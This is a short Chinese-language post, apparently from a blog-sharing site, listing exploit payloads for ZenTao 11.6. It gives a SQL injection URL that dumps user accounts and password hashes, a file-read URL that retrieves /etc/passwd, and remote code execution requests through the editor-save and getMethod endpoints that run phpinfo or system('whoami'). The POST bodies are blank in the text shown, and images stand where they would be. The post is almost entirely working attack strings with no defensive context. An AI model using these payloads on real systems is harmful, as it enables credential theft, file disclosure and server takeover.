禅道CMS 11.6漏洞

一.SQL注入漏洞

Payload:

http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

二.任意文件读取漏洞

Payload:

http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd

三.远程代码执行漏洞

1)远程代码执行命令phpnifo();

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=

禅道CMS 11.6漏洞_第1张图片

Payload2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=

禅道CMS 11.6漏洞_第2张图片

2)远程代码执行命令system('whoami');

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=

禅道CMS 11.6漏洞_第3张图片

Payload 2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=

禅道CMS 11.6漏洞_第4张图片

 

你可能感兴趣的:(禅道CMS 11.6漏洞)